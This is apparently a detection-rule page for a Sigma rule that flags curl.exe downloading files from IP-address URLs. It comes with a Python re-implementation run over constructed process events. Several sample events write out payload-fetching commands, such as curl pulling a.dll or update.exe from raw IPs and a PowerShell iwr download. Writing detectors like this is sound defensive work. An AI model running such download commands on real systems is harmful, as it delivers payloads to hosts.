
File Download From IP URL Via Curl.EXE

Sigma Rules

Summary
This detection rule identifies executions of the Windows command-line utility curl.exe that download a file from a URL whose host is a literal IP address rather than a hostname. It uses the process creation log source category and matches on the command line: a regular expression captures an IPv4 address immediately following the URL scheme, and the command line must also carry an option that writes the response body to disk, such as '-O', '--remote-name' or '--output'. A filter excludes command lines that fetch certain common file extensions, which reduces noise from downloads that are usually benign. The rule gives visibility into file downloads performed with a legitimate, signed binary, a technique attackers use to deliver payloads or data-exfiltration tooling while blending in with allowed executables. False positives are expected where curl is legitimately pointed at an IP address (internal services, scripted deployments, lab hosts), so analysts should review the parent process, the user context and the destination address before escalating.
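The following is an added example, not code from the rule page or from the Sigma project: a Python re-implementation of the detection logic the summary describes, run over a constructed set of process-creation events. The field names (Image, OriginalFileName, CommandLine), the extension exclusion list and the use of OriginalFileName to catch a renamed binary are assumptions chosen for illustration, not the rule's actual selection and filter blocks.

```python
"""Re-implementation of the 'curl.exe download from IP URL' detection logic.

Added example, not the rule page's own code. Field names, the exclusion
list and the renamed-binary check are assumptions for illustration.
"""
import re

# IPv4 literal directly after the URL scheme, e.g. http://10.0.0.5/x.exe.
# Mirrors the kind of regex the summary describes; it deliberately does not
# validate octet ranges, which is fine for a detection that wants recall.
IP_URL_RE = re.compile(r"://(?:[0-9]{1,3}\.){3}[0-9]{1,3}")

# curl options that write the response body to a file. Sigma string matching
# is case-insensitive by default, so ' -O' also covers ' -o' here, and we
# mirror that by lower-casing the command line before the substring check.
DOWNLOAD_OPTS = (" -O", "--remote-name", "--output")

# Assumed exclusion list (hypothetical): extensions of files that are
# commonly fetched legitimately and would otherwise flood the alert queue.
BENIGN_EXTENSIONS = (".png", ".jpg", ".jpeg", ".gif")


def is_curl(event: dict) -> bool:
    """True if the process is curl, by image path or by original file name.

    Checking OriginalFileName (an assumption here) catches an attacker who
    copies curl.exe to another name to dodge a path-only match.
    """
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith("\\curl.exe") or original == "curl.exe"


def matches(event: dict) -> bool:
    """Apply selection (curl + IP URL + download option) then the exclusion."""
    if not is_curl(event):
        return False
    cmd = event.get("CommandLine", "")
    if not IP_URL_RE.search(cmd):
        return False
    low = cmd.lower()
    if not any(opt.lower() in low for opt in DOWNLOAD_OPTS):
        return False
    if any(ext in low for ext in BENIGN_EXTENSIONS):
        return False
    return True


def triage(events) -> list:
    """Return the command lines of all events the rule would fire on."""
    return [e["CommandLine"] for e in events if matches(e)]


# Constructed sample events; none of these are real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"curl.exe -O http://192.168.56.101:8080/update.exe"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"curl.exe http://10.0.0.5/status"},  # no download option
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"curl.exe --output C:\Users\Public\a.dll https://185.199.110.153/payload"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"curl.exe -o page.html https://example.com/index.html"},  # hostname
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"curl.exe -O http://10.1.1.1/logo.png"},  # excluded extension
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"powershell.exe -c iwr http://10.0.0.9/x.exe -OutFile x.exe"},  # not curl
    {"Image": r"C:\Temp\cu.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"C:\Temp\cu.exe -O http://172.16.0.9/x.bin"},  # renamed curl
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print("ALERT:", hit)
```

Running the block prints three alerts: the -O download from 192.168.56.101, the --output download from 185.199.110.153, and the renamed binary fetching from 172.16.0.9. The hostname-based fetch, the request with no download option, the PowerShell event and the .png download are all left alone, which is the behaviour a tuned rule should show before it is deployed.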
Categories
  • Windows
  • Endpoint
Data Sources
  • Process
Created: 2023-10-18